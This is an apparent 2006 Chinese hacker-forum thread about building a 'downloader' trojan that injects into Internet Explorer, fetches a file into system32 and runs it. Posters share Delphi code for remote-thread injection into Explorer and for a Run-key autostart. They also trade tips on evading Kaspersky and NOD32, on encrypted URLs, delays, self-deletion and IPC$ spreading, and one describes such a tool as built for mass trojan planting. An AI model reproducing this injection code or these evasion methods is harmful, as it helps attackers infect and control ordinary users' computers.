软件作者：小野
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

功能：无壳，无DLL，插入IE，下载完成后自动关闭IE进程。
美化了下界面，用北斗压缩下下。

xiazaizhe.JPG (13 KB)

2006-8-14 22:40

做的匆忙。
如果有BUG，请回帖告之，多谢。
p.s:下载文件到system32目录下test.exe文件。

引用:

这里是引用第[4 楼]的dingking于2006-08-15 00:58发表的：
1，2楼的要被关小黑屋的。。。。

小野SHARE下代码啊。。。 [s:70]

3楼估计也要被关了······
[s:75] 你倒也不客气哈，最讨厌这样没技术含量的 [s:65]
要代码起码也要先啪啪我马屁，忽悠地我晕晕的，然后把代码给你哈····
  [s:59]

=。=#
其实，原代码挂了，由于猪3给我个东西叫我汉化，然后装又装不成功
卸载又卸8掉，一怒，把H盘给格了·····
忘记了DELPHI文件夹也在里面
现在还在下DELPHI呢~~~闷~~
找猪3报仇吧······
  [s:71]

其实用od看下基本代码都在里面了.

winexec->GetWindowThreadProcessId->OpenProcess->CreateRemoteThread->URLDOWNLOADTOFILE->exitprocess

引用:

这里是引用第[2 楼]的风蓝于2006-08-15 02:56发表的：
其实用od看下基本代码都在里面了.

winexec->GetWindowThreadProcessId->OpenProcess->CreateRemoteThread->URLDOWNLOADTOFILE->exitprocess

恩
winexec两个作用运行下载的程序和打开IE
GetWindowThreadProcessId->OpenProcess->CreateRemoteThread  exitprocess
  
这4个不用说了 获取，打开，插入进程，离开

URLDOWNLOADTOFILE 下载
还有个sendmessage用来关闭IE进程的

API函数的调用

其实值得研究的是生成器的代码

没必要要代码吗，根据功能，自己也能写出来。何况现在的下载者的代码多的如牛身上的牛毛。
我觉的最好要学会自己解决问题。

生成器有奥秘吗？还不就是资源文件，至于是写文件底部，还是直接改写，都差不太多．

值得研究的地方是自启动，如何让重装系统后不失效．

引用:

这里是引用第[5 楼]的xiao2004于2006-08-15 12:33发表的：
生成器有奥秘吗？还不就是资源文件，至于是写文件底部，还是直接改写，都差不太多．

值得研究的地方是自启动，如何让重装系统后不失效．

[s:43] 生成器写了半天，闷~
下载者为什么要自启动啊
重装系统后不失效
=。=#
把病毒放到其他盘符

几乎所有的无DLL都是运用这种方法吧:
begin
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看

ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, Pid); //打开进程

hModule := Pointer(GetModuleHandle(nil));
//这里得到的值为一个返回一个指针型变量,指向内容包括自身映像的基址和长度

Extent := PImageOptionalHeader(Pointer(integer(hModule) + PImageDosHeader(hModule)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//得到内存映像的长度

VirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);
//在Exp进程的内存范围内分配一个足够长度的内存

hModule_News := VirtualAllocEx(ProcessHandle, hModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定起始基址和内存映像基址的位置

WriteProcessMemory(ProcessHandle, hModule_News, hModule, Extent, Size);
//确定上面各项数据后,这里开始进行操作

CreateRemoteThread(ProcessHandle, nil, 0, @Download, hModule, 0, ThreadId);
//建立远程线程,至此注入过程完成

CloseHandle(ProcessHandle);
//关闭对像
end.
你的那个是插IE的

下载者自启动,写注册表杀毒软件会有提示,写服务服务端就会太大.

完全没必要.

偶也写过一个加启自动和IPC$共享传播的下载者才11.5KB
加自自动方面可以不用registry单元.因为Delphi都是因为加到单元才会变大的.
可以用纯API函数来添加自启动.自启动方面还要考虑是否连网... [s:73]  [s:73]
begin
  try
   exefile:='C:\fuckdown.exe';
   l := regopenkey(HKEY_LOCAL_MACHINE, 'SOFTWARE', k1);
   l := regopenkey(k1, 'Microsoft', k1);
   l := regopenkey(k1, 'Windows', k1);
   l := regopenkey(k1, 'CurrentVersion', k1);
   l := regopenkey(k1, 'Run', k1);
   p := pchar(exefile);
   l := regsetvalueEx(k1, pchar('FuckDown'), 0, 1, p, length(exefile) + 1);
  except
end;
程序就像女孩子的裙一样,越短越好... [s:70]

引用:

这里是引用第[9 楼]的suck于2006-08-15 16:33发表的：
下载者自启动,写注册表杀毒软件会有提示,写服务服务端就会太大.

完全没必要.

难道写注册表杀毒软件就会有提示么？要看你怎么写了。呵呵

引用:

这里是引用第[3 楼]的icexiaoye于2006-08-15 03:31发表的：


恩
winexec两个作用运行下载的程序和打开IE
GetWindowThreadProcessId->OpenProcess->CreateRemoteThread  exitprocess
.......

不引入DLL的纯代码注入不如用SetThreadContext的方法，毕竟监控CreateRemoteThread的安全软件比监控SetThreadContext的多。

插入IE已经过时了，现在好多软件对IE都有监控插入时就会报警。

引用:

这里是引用第[13 楼]的opsun于2006-08-17 14:58发表的：
插入IE已经过时了，现在好多软件对IE都有监控插入时就会报警。

换个进程插也行哈
只要是关于网络互联的
又要是大众必备的
还要考虑权限问题

引用:

这里是引用第[12 楼]的xyzreg于2006-08-16 01:05发表的：

不引入DLL的纯代码注入不如用SetThreadContext的方法，毕竟监控CreateRemoteThread的安全软件比监控SetThreadContext的多。

明白了

引用:

这里是引用第[14 楼]的icexiaoye于2006-08-17 18:42发表的：
换个进程插也行哈
只要是关于网络互联的
又要是大众必备的
还要考虑权限问题

请问一下.你的权限问题是怎么解决的!!!?

引用:

这里是引用第[15 楼]的caijing28于2006-08-17 21:35发表的：

请问一下.你的权限问题是怎么解决的!!!?

换个思路，既然要权限咱就不去插不就得了····
呵呵
下载者要的是精简~~~ [s:75]

有这部分代码提供不,URLDOWNLOADTOFILE的那段,远程线程插入的代码不能直接使用api,网上找了些许代码也都是处理单一函数,要计算大小等,很是头疼

一开檔 卡巴就提示报警了。
不过还是给楼主白拍手一下

19楼~~权限问题

至于被杀
呵呵
可能是线程插入被卡吧的行为检测查到了吧~~

至于其他几楼说顶的就不必了~~~准备进黑屋吧
呵呵，写东西是为了锻炼

能过nod32的下载者估计很难找到了，它直接就跟踪一些特殊函数

引用:

这里是引用第[20 楼]的ly603于2006-08-19 20:40发表的：
能过nod32的下载者估计很难找到了，它直接就跟踪一些特殊函数

未必。我很久以前为公司写的一个“下载者”，nod32就查不出来。
没做什么特殊保护。普通的远程线程插入而已。

估计没查出来是因为我的“下载者”功能多，nod32分辨不了其核心功能就是下载。
功能包括：
支持Win98/ME/2000/XP/2003；
98下新建隐藏IE进程并用SetThreadContext插入线程，2000下CreateRemoteThread插入线程到IE或svchost（IE优先）；
可配置多个URL交替尝试下载；
加密保护配置中的URL；
防止重复执行（下载线程是唯一的）；
支持休眠指定时间再开始下载；
运行后立刻自删除；
自启动，直到下载成功（可选功能，成功后自删除）。

全部用C写的，程序大小只有5K，当然，没有加壳。
由于要支持98/ME，不然可以更小（不是因为少功能，而是用了编译参数/align:16，在98下就不让跑）。

显然，这是专门用于大规模放马的。加密URL、休眠、自删除等功能都是一种自我保护。
各位，普通的“下载者”太无趣了，谁要再写“下载者”至少也得像我那个啦。 [s:51]

补充一句，我那个“下载者”的功能，实现起来都很简单，毕竟是很多年前的东西了。
关键是要有创意。

引用:

这里是引用第[24 楼]的zzzevazzz于2006-09-12 19:40发表的：


未必。我很久以前为公司写的一个“下载者”，nod32就查不出来。
没做什么特殊保护。普通的远程线程插入而已。

.......

nod32查不出来 但运行的时候 应该过不了AVP的主动防御吧
似乎现在所谓的免杀不包括过主动防御

那当然。又不是写rootkit。我写那个“下载者”的时候，还没“主动防御”呢。

引用:

这里是引用第[6 楼]的icexiaoye于2006-08-15 12:43发表的：


[s:43] 生成器写了半天，闷~
下载者为什么要自启动啊
重装系统后不失效
.......

不加倒好 搞的太复杂就会被主动防御检测到
下载者搞好了 也没必要在高的那么复杂了 针对的普通的用户  基本上对技术一无所知  只要内存 文件过了就可以 搞太复杂也没什么用